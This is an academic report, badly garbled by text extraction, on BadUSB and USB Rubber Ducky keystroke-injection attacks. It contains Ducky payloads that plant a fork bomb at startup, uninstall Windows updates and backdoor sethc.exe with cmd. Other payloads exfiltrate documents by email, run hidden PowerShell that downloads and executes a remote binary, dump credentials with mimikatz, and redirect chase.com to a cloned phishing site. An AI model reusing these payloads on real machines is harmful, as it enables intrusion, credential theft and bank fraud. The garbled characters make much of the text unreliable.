USB Injectable Script Hacking

7/21/2019 USB Injectable Script Hacking

1/22

Shawn Seaman

Professor Hayajneh

Network Security and Perimeter Protection

Bad USB:Abusing the Inherent Trust of I! "e#ies

USB has become such a standard interface in the IT wor$d because of its sheer #ersati$ity%There is a mu$titude of de#ices that connect through the USB interface& making it a '( interfacefor many) ty*e of techno$ogy% If so many different hardware im*$ementations can connectthrough the USB standard& what ty*es of security mechanisms are offered and what is the*rocess of discerning the ty*e of hardware+ Unfortunate$y& the bu$k of USB de#ices on themarket are in a sense HI",s-Human Interface "e#ices.& or more sim*$y *ut& de#ices that re$y ondirect *hysica$ interaction with human beings% In a $itera$ sense& it wou$d seem that there wou$dnot be many& if any& *ractica$ security methods a**$ied to USB% /hy wou$d a workstation nottrust a USB de#ice& when it is trusted by the human+ Humans trust keyboards& so therefore&com*uters trust keyboards% /ebcams or keyboard de#ices being engineered on the firmware$e#e$& to become Trojan horses that secret$y de$i#er *ay$oads was ne#er fathomed by the IT

security wor$d& and for good reason% The *hysica$ com*onents that makeu* a USB de#ice andthe fact that com*anies do not $ock down their firmware on the de#ices they *roduce& has $ed tothe abi$ity by security researchers to e0*$oit USB% /ith the use of custom code injection&firmware re#erse engineering& and the inherent trust of !S,S across a$$ *$atforms-1inu0& 2ac&and /indows.& to trust USB de#ices& researchers ha#e tru$y been ab$e to turn good de#ices e#i$%

/hat e0act$y is USB and BadUSB+ USB stands for Uni#ersa$ Seria$ Bus& it is a standardde#e$o*ed in the ear$y (334,s that created the communication *rotoco$s in a bus connection&communication and *ower su**$y between com*uter-or motherboard. and the other de#ice%( TheUSB *rotoco$ simu$taneous$y *owers the de#ice as we$$ as created mediums for data transfer&data stream& and communication%5rror: 6eference source not found BadUSB is a new c$ass ofattack that focus re$ies on the USB interface itse$f% This e0*$oit is technica$$y se*arate fromo*erating system security& though it does re#e$ in the fact that machines trust USB by defau$t% Ina sense the BadUSB takes ad#antage of the $ack of embedded security in USB de#ices% TheUSB de#ice& whether it is a keyboard& webcam& mouse& or e#en a joystick& becomes ma$icious

1(http://msdn.microsoft.com/en-us/library/windows/hardware/53893!"8#$#s.85!"9.asp%& n.d.'

p. 1


2/22

through de#ice tam*ering& not !S tam*ering%7 This makes BadUSB so dangerous% It dua$$ywie$ds the abi$ity to be hidden in a joystick or webcam-are workstations going to scanjoysticks+.& and has the #ersati$ity of being !S inde*endent% 2any #irus *rogrammers on$ytarget s*ecific !S,s due to the different $ibraries or de*endencies they contain%-Trojans coded in8a#a do infect a$$ !S,s. BadUSB does not face the *rob$em of de*endencies& as for the most

*art& a$$ !S,s wi$$ acce*t& for e0am*$e: keyboards% It is #ery im*ortant to know what BadUSB isnot& before tru$y understanding what it indeed is% 9iruses& Trojans& worms& or other ma$warereuire !S de*endent $ibraries& d$$,s& and other de*endencies& not to mention anti#irus andfirewa$$ e#asion& but BadUSB is the o**osite of this ty*e of attack #ector% BadUSB is not a *ieceof ma$ware sitting on the f$ash storage *ortion of the USB de#ice%5rror: 6eference source notfound Turning a USB ;e#i$) re$ies on actua$$y re*rogramming the USB de#ice itse$f at thefirmware $e#e$% "ee* $e#e$ code injection into the firmware& through re#erse engineering& canturn a sim*$e USB micro*hone into a de#ice ca*ab$e of injecting keystrokes si$ent$y% /hatdamage can keystroke injection do+ The *ossibi$ities are indeed end$ess& and they wi$$ bedemonstrated in this re*ort by e#en a no#ice user% Si$ent$y e0ecuting commands #ia /indowsPowerShe$$ can cause ha#oc on a workstation% So it is understood that BadUSB can emu$ate a

keyboard% Anti#irus wi$$ not be ab$e to scan this as ma$icious& it sim*$e reads as a keyboard% Thede#ice can now e0ecute *ossib$e *owershe$$ commands on the !S to de$ete fi$es& infi$trate fi$es&or insta$$ ma$ware% The host,s fi$e of a workstation can be edited& which wi$$ redirect users tos*ecific websites of the attacker,s choice% /ith the right socia$ engineering attackim*$ementation& this can cause credentia$s to be sniffed through the use of c$oned websites% Asecond attack #ector of BadUSB is that of s*oofed network ada*ters%5rror: 6eference source notfound This can be a huge *rob$em if the attacker embedded code in this e0am*$e to change thecom*uters "NS settings to redirect traffic% Security mechanisms wi$$ o#er$ook this attack& and2an in the 2idd$e attacks wi$$ become easy% It wou$d be sim*$e to im*$ement a rogue access*oint& ha#ing unknowing users connect to it& and then subjecting them to 2an in the 2idd$eattacks% They wou$d be none the wiser considering there is no *rotection against detecting aUSB mouse transforming into a s*oofed network ada*ter% Another e0*$oit BadUSB can takead#antage of is the fact that many de#ices are *$ugged in and recogni


3/22

*re#ious$y% A$$ USB de#ices ha#e a contro$$er chi*% The user doesn,t interact with contro$$erchi*% An e0am*$e of this wou$d be if the user is interacting with f$ash dri#e for fi$e storage& theyare on$y interacting with the mass storage *ortion of the de#ice% The same f$ash dri#e stores afirmware which is e0ecuted by the contro$$er chi*% Again the user does not interact with thefirmware& on$y the fact that the USB is deemed 'a mass storage de#ice%) Unfortunate$y& this goes

for the !S as we$$%

So if the workstation on$y sees what the USB wants it to see& but not the underworking at thefirmware $e#e$& it can be assumed that there are some security f$aws that cou$d be s*awned fromthis design% It shou$d be understood then the mechanics behind how USB de#ices identifythemse$#es to workstations% The host contro$$er inside the workstation wi$$ recogni


4/22

more c$air#oyant% /e are assuming here that the attacker has a$ready re#erse engineered thefirmware and has begun to inject code into the em*ty s*aces in said firmware%

An attacker can modify theinterface to show:(?webcam (@?#ideo%5rror: 6eference source not found This is te$$ing the hostcontro$$er of a workstation that a f$ash storage de#ice has audio and #ideo ca*abi$ity& and to betreated as such by $oading said dri#ers% 5nd*oints are data *orts res*onsib$e for streams of

information through the bus% Think of end*oints $ike TP streams%5rror: 6eference source notfound The end*oints *ortion of the USB wi$$ a$ways ha#e a contro$ *ortion identified 4% Herethe attacker modified the end*oints to no $onger be the data transfer *rotoco$ that was suitab$e forthe f$ash storage de#ice& but instead has to$d the workstation to accommodate for #ideo transferstreams and audio transfer streams% This storage de#ice is being com*$ete$y read as a webcam atthis *oint% This has the makings of an e#i$ firmware that accesses the audio and #ideo ca*turesof a workstation and uses them for insidious reconnaissance% U*on $ooking at the seria$ numbermodification& a few im*ortant things can be noted% The seria$ numbers are not e#en the same$ength% USB does not ha#e a fi0ed seria$ number or any ty*e of constant method behind USBseria$ numbers%5rror: 6eference source not found They are com*$ete$y randomi


5/22

6eference source not found This ga#e them com*$ete access to the USB firmware to make theUSB de#ices *erform and a**ear as any ty*e of USB de#ice% The first ste* was to find $eakedfirmware on net% In order to re#erse engineer the USB chi* from the s*ecific 7 com*anies theytargeted& they needed the necessary code% They then a**$ied heuristics to code% They countedmatches with start and ca$$ instructions for different memory $ocations%5rror: 6eference source

not foundThis a$$owed them to find the descri*tors in the binary code% !nce they essentia$$y hadthe firmware ma**ed out& they insta$$ed their own hooks and injected their own code in unused*arts of the firmware% -this cou$d be *erformed on webcams& keyboards etc%& but they focused ona f$ash storage de#ice. This ty*e of re#erse engineering they a**$ied to on$y two chi*s% Butnothing it sto**ing ma$icious users with resources to re#erse engineer many chi*s from manycom*anies%

Noh$ and 1e$$ ran mu$ti*$e demo attacks% They ran the attacks on a 1inu0 system% The firstattack re#o$#ed around gaining admin credentia$s and esca$ating *ri#i$eges% 1inu0 reuiresma$ware to run with root *ri#i$eges to infect other USB de#ices or become a network ada*terthat changes "NS settings% They needed to esca$ate *ri#i$eges to get root access% How was thisdone+ They got the sudo *assword on the machine% The USB e0ecuted kb commands to acti#ate

and restart the screensa#er% The user at this *oint re?entererd the *assword to get off thescreensa#er& and then the ma$ware sto$e the sudo-admin. *assword by ma$ware injected in abinary re$ated to the screensa#er $ibraries%5rror: 6eference source not found Now furtherdamage can be done to the system as Noh$ and 1e$$ now had com*$ete root access% This a$$re$ied on keyboard injection and code injected into screensa#er de*endencies& and none of thema$icious acti#ity took *$ace on the storage *ortion that interacts with the !S% This com*$ete$ye#ades anti#irus% The second attack had the USB stick s*oofed as a network ada*ter% Theysuccessfu$$y got the USB storage de#ice to act as a "HP ser#er and assign an IP& but not assigna defau$t gateway% This te$$s the workstation to use the "NS ser#er but doesn,t te$$ it how toreach it%5rror: 6eference source not found This is a form of "NS *oisoning% A rea$ wor$dim*$ementation of this attack wou$d be when a #ictim browses to htt*s:chase%com& but goes to

attackers #ersion of a c$oned chase%com& enters their credentia$s through the s*oofed site% 9irusscanners won,t *ick u* on this% They a$so *ro*osed a theoretica$ #irtua$ machine breakoutattack% A USB de#ice *rogrammed to s*awn into two USB de#ices& where the second de#iceconnects to the host com*uter& then begins injection to *i$$age the system% This cou$d be atroub$e for backed u* c$oud ser#ers on #irtua$ machines% Noh$ and 1e$$ a$so *erformed attacksusing an android *hone% They sim*$y *$ugged the *hone into a workstation to charge the *hone%Not on$y did the *hone charge& but they *erformed the "NS attack as we$$%5rror: 6eferencesource not found

It has been discussed in great detai$ what BadUSB can do& but what security mechanisms canbe taken to a#ert the e0*$oit+ Are software ro$$backs a #iab$e so$ution+ onsider this scenario%

The system admin decides to reinsta$$ o*erating systems& or do ro$$backssystem restores to c$eanu* the attack% They need to reco#er from the #irus& and wi$$ most $ike$y $ose time and moneyduring the effort% The *rob$em is that this is not *atchab$e #ia software% If the keyboard hasinfected firmware& the system admin wou$d ha#e to rea$i


6/22

seria$ number% Perha*s a firewa$$ so$ution does ha#e this feature% It wou$d not matter% Seria$numbers are not mandatory as mentioned before& and can be s*oofed% If the user a$$ows akeyboard from 1ogitech for e0am*$e& with a certain seria$ number& and the firewa$$ white $istsitDDthe BadUSB e0*$oit can detect this and s*oof this seria$%5rror: 6eference source not foundAnti#irus meet a simi$ar fate of ineffecti#eness as its *redecessors% They are es*ecia$$y

ineffecti#e if the USB de#ice is *$ugged in at boot time and a rootkit is insta$$ed #ia boot sector&as a$ready discussed%5rror: 6eference source not found /hat if de#ice is *$ugged in during $oginand is scanned immediate$y+ The scanner wants to read contents of the de#ice but this is donewith the *ermission and assistance of the firmware% If the firmware is *rogrammed to $ock itse$fdown from being read& the scanner is use$ess%5rror: 6eference source not found Possib$e fi0eson$y e0ist in the rea$m of the hardware manufacturers at this time% 2anufacturers need toim*$ement a $ocked firmware% The *rob$em with this is now there can be no feasib$e way toha#e firmware u*dates% It is abso$ute$y un*ractica$ to $ock down the firmware% It is *ossib$e touse cry*togra*hic signatures for firmware but this is hard and e0*ensi#e to im*$ement on USBmicrocontro$$er chi*s% It is so cost$y that this im*$ementation wou$d most certain$y ne#erbecome mainstream and e#o$#e into a USB standard of security%5rror: 6eference source not

found 50amination of the Iron=ey USB storage de#ice& and its hefty *rice tag of o#er (44do$$ars for (E gb of data storage& *ro#ides the assurance of cry*togra*hic signing not becoming a

standard%5rror: 6eference source not foundIronkey offers mi$itary grade encry*ted USB *roducts& as we$$ as *hysica$ *rotection% Theyassure that there USB storage de#ices are not susce*tib$e to BadUSB attacks% This is onee0am*$e of a com*any using code signing encry*tion methods to authenticate firmware u*dates%If the firmware cannot be authenticated it cannot be used% It basica$$y se$f?destructs% This ise0*ensi#e& time$y and hard to do with a USB contro$$er chi*& and therefore in a$$ $ike$ihood wonts*read to the masses as a USB standard%

It is ob#ious and common sense that to ha#e any effect and com*romise security& the

attacker needs at one *oint or another& whether by his own hands or the #ictim& *hysica$ access toa machine% /hat methods can be used to infect users with BadUSB+ The art of socia$engineering sticks out as the most effecti#e way to uti$i


7/22

that he wou$d actua$$y s*rink$e ma$icious USB dri#es in com*any *arking $ots& just assumingem*$oyees wou$d *ick them u* and use them%5rror: 6eference source not found 5#eryone $ikesa free storage de#ice% It can be im*ortant to take ad#antage of *hysica$ security if networkingsecurity is u* to *ar% If an attacker cannot get through the network& it is *ossib$e if they had thewi$$& to infi$trate com*anies *hysica$$y& and dro* USB de#ices on sysadmin desks& or *erform the

attacks themse$#es at an unmanned workstation% If imagination *ermits& an ad#ersary with hugeamounts of resources& *ackages BadUSB infected keyboards with workstations meant to beshi**ed to a go#ernment $ocation% They gain access to the workstations before shi*ment& andswa* out the keyboards for the same one& just with a modified firmware% Anything is *ossib$ewhen it comes to BadUSB attacks& and that is most$y due to how re$ied they are on as HI",s%

The USB 6ubber "ucky e0em*$ifies how any USBde#ice can become an 4. The6ubber "ucky& by the com*any HakF& has the motto& 'I> IT GUA=S 1I=5 A =5B!A6"&AN" TP5S 1I=5 A =5B!A6"& IT 2UST B5 A =5B!A6") The rubber ducky is a @4do$$ar USB de#ice that is used by *enetration testers or ma$icious attackers% It acts as a keyboardmore s*ecifica$$y& it,s a keyboard injection too$ with its own scri*ting $anguage that the attackercan customi


8/22

#ita$ to go o#er the "ucky synta0 and commands% The command

652& is ana$ogous to that of a comment command% Any code that begins on a $ine with 652wi$$ not be e0ecuted% It shou$d be known that each command ha**ens on a se*arate $ine in asynchroni


9/22

most sim*$e *rogram% This is to understand the *rocess before the *rograms get more com*$e0%

The duckencode%jar is na#igated to #ia command *rom*t% 50ecute ja#a jar duckencode%jar ieasy*ay$oad%t0t o inject%bin% This takes the "uckyscri*t in the te0t fi$e and out*uts it to aninjectab$e jar fi$e% After co*ying the *ay$oad to the S" card and $oading it to the "ucky& thescri*t was e0ecuted%

"51A 444

CUI r

"51A (444

ST6INC winword%e0e

5NT56

"51A 7444

5NT56

ST6INC 2 NA25 IS SHA/N S5A2AN& THIS IS TH5 2!ST BASI I2P1525NTATI!N !> TH5 IN85TAB15 USB "59I5JSAPABI1IT

ST6INC 5NT56

ST6INC T! IN85T =5ST6!=5S !N A 2AHIN5% H511! /!61"K

"51A 444

CUI r

"51A 744

ST6INC note*ad

5NT56

"51A 744

ST6INC He$$o /or$dKKK

p. 9


10/22

5NT565rror: 6eference source not found

This sim*$e scri*t o*ened u* 2icrosoft /ord on the workstation and e0ecuted the strings*ecified% The second scri*t was a fork bomb batch scri*t& that initia$iork bombs are denia$ of ser#ice attacks that continua$$y ca$$ on themse$#es in the code& in orderto constant$y re*$icate ti$$ there are no resources $eft on the P% !n$y re$e#ant code wi$$ be

shown from now on% >u$$ codes wi$$ be u*$oaded se*arate$y%ST6INC cd :LProgram"ataL2icrosoftL/indowsLStart 2enuLProgramsLStartu*L5NT56ST6INC co*y con a%bat5NT56ST6INC Mecho off5NT56ST6INC :STA6TF

This ne0t scri*t wi$$ de$ete /indows U*dates% This scri*t was es*ecia$$y usefu$ for making a*atched /indows machine #u$nerab$e to e0*$oits%

/5NT56ST6INC Oin*ut J=B7Q@F(QJ5NT56ST6INC Oin*ut Oin*ut%6e*$ace-J=BJ& JJ.5NT56ST6INC OcmdString Jwusa uiet norestart uninsta$$ kb:J R Oin*ut5NT56ST6INC In#oke?50*ression ?ommand OcmdString5NT56ST6INC 65C A"" H=12LS!>T/A65L2icrosoftL/indows NTLurrent9ersionLImage >i$e

50ecution !*tionsLsethc%e0e) R R ' # "ebugger t 65CS d:LwindowsLsystem7Lcmd%e0e5NT56E

The $ine 'ST6INC Oin*ut J=B7Q@F(Q) is es*ecia$$y im*ortant as that $ine is where you insertthe u*date you want remo#ed% 2u$ti*$e *ay$oads can be *ut onto the S" card& which meansmu$ti*$e u*dates can be uninsta$$ed% After this scri*t was run on the target com*uter& Armitage

5 https://ithub.com/ha05darren/+-,ubber-4uc0y/wi0i/ayload---for0-bomb2 http://www.duc0tool0it.com/+cript+election.6sp

p. 1


11/22

was used to scan for& and e0ecute a *ay$oad on the target host% A re#erse she$$ was initiated and

the machine was e0*$oited%

The ne0t attack is ca$$ed '"uckS$ur*) and it acts as a keyboard injector as we$$ as asimu$taneous storage de#ice% The *oint of this attack is to uick$y and si$ent$y co*y the entirecontents of '2y "ocuments&) to the "ucky% It uti$irom Jshawn*ortscanMgmai$%comJ5NT56ST6INC O6e*ort5mai$%To%Add-Jshawn*ortscanMgmai$%comJ.5NT56ST6INC O6e*ort5mai$%Subject J"uck Too$kit 6econ 6e*ortJ5NT56

* https://forums.ha05.or/inde%.php7/topic/31*9-payload-duc0-slurp-#"-silent/

p. 11


12/22

ST6INC O6e*ort5mai$%Body JP$ease find attached your reconnaissance re*ort%J5NT56ST6INC O6e*ort5mai$%Attachments%5rror: 6eference source not found

In this scri*t*ortscanbyshawnMgmai$%comand *assword(7@ were used for demo *ur*osed& but

these can be customi


13/22

CUI r"51A (44ST6INC *owershe$$ ?windowsty$e hidden -new?objectSystem%Net%/eb$ient.%"own$oad>i$e-Jhtt*:shawns*ay$oadbob%o$dJ&J\T52P\Lbob%e0eJ.VStart?Process \T52P\Lbob%e0e

5NT56

The sim*$e added string 'windowsty$e hidden&) wi$$ kee* the *owershe$$ in#isib$e during thisentire e0ecution% Powershe$$ wi$$ use the wget command to *u$$ the content from'shawns*ay$oad) and target wi$$ be e0*$oited%

The attacker can a$so edit the hosts fi$e for good measure if they wish% In this e0am*$e&we can set www%chase%com& to redirect to a ma$icious #ersion that wi$$ *u$$ the credentia$s%5rror:6eference source not foundT61?SHI>T 5NT56"51A @44

ST6INC cd :L/indowsLSystem7Ldri#ersLetcL5NT56"51A @44ST6INC echo E@%(@3%(77%3@ www%chase%com]]hostshase wi$$ be the site the #ictim wi$$ attem*t to go to& whereas the IP is the site the #ictim wi$$ beredirected to%

This ne0t 6ubber "ucky attack uti$i


14/22

ST6INC sekur$sa::$ogonPasswords fu$$5NT56

The "ucky as shown a$ready& can edit the hosts fi$e& but what if the attacker did a moread#anced "NS *oisoning& and a$so used a *enetration testing too$ to further the b$ow% The be$ow

sni**et of code is the meat and *otatoes of this "NS *oisoning attack%(@

redirectionAddress J(4%7FF%(E3%E J5NT56ST6INC OredirectedSite Jwww%chase%com$oginJ5NT56ST6INC Ohosts OredirectionAddress R J J R OredirectedSite5NT56ST6INC Ohosts7 OredirectionAddress R J www%J R OredirectedSite5NT56ST6INC Add?ontent ?9a$ue Ohosts ?PathJ:L/IN"!/SLSST527L"6I956SL5TLH!STSJ

5NT56ST6INC Add?ontent ?9a$ue Ohosts7 ?PathJ:L/IN"!/SLSST527L"6I956SL5TLH!STSJ

The attacker shou$d modify 'OredirectedSite) to the site the #ictim assumes to be #isiting%Then the attacker shou$d modify the 'OredirectedSite) to the IP they are running the c$oned#ersion of the website on% ommon e0am*$es wou$d be socia$ media sites such as Twitter and>acebook& or financia$ institutions such as hase or T"Bank% The attacker can now send as*oofed emai$ to the #ictim& te$$ing them they need to re?enter their credentia$s at chase%com%Sus*icion wi$$ be a#oided as the attacker can ty*e the actua$ chase U61 into the emai$% Using=a$i 1inu0 too$ S5T& the attacker wi$$ be broadcasting this c$oned chase site on the network%

1) https://ithub.com/ha05darren/+-,ubber-4uc0y/wi0i/ayload---local-dns-poisonin

p. 1)


15/22

hoose o*tion (: Socia$ 5ngineering Attacks%

p. 15


16/22

p. 12


17/22

Then se$ect o*tion 7% The attacker wants to e0*$oit the #ictim,s browser% Then se$ect o*tion

for redentia$ Har#ester Attack%

p. 1*


18/22

Now the attacker wi$$ choose to c$one

chase%com%

p. 18


19/22

In the screenshot abo#e www%chase%comwas entered & and c$oned% The i* address (4%7FF%(E3%E

wi$$ be the attackers 1H!ST or e0ternat host i*% The on$y ste* $eft is to start the A*ache ser#er%

!nce the #ictim attem*ts to go to www%chase%com& they wi$$ be redirected to a c$oned hase

website at (4%7FF%(E3%E& and the credentia$s $ogged%

The fina$ attack was *erformed on a Samsung Ca$a0y S@& running a fu$$y u*dated #ersion

of Android% The *oint of this attack was to brute force a @ digit *in% These wi$$ be a$$

combinations from 4444 to 3333% That is nine thousand nine hundred and ninety nine *ossib$e

*in combinations% 5#en Android and I*hone,s wi$$ read USB de#ices as keyboards% The

6ubber "ucky thankfu$$y came with an ada*ter% The ma$e side of the "ucky *$ugs direct$y into a

p. 19
http://www.chase.com/http://www.chase.com/http://www.chase.com/http://www.chase.com/


20/22

ty*e?a fema$e connector& and that is con#erted on the end to a micro?USB ma$e connector% This

*$ugs direct$y into the charging *ort of Samsung Ca$a0y S@% It shou$d be noted that after fi#e

fai$ed *in attem*ts on an Android& the Android de#ice wi$$ $ock for 4 seconds%5rror: 6eference

source not found Ana$y


21/22

source not found /hen testing on the Android the *in was set to 4443& for time sa#ing sake& and

it did work f$aw$ess$y%

/hether uti$i


22/22

% htt*s:forums%hakF%orginde0%*h*+to*ic4(3?*ay$oad?duck?s$ur*?#7?si$entQ% htt*s:github%comhakFdarrenUSB?6ubber?"uckywikiPay$oad???netcat?>TP?

down$oad?and?re#erse?she$$3% htt*s:github%comhakFdarrenUSB?6ubber?"uckywikiPay$oad???*owershe$$?

wget???e0ecute(4% htt*:b$og%o*ensecurityresearch%com74(74Eusing?mimikat

USB Injectable Script Hacking

Documents

Transcript of USB Injectable Script Hacking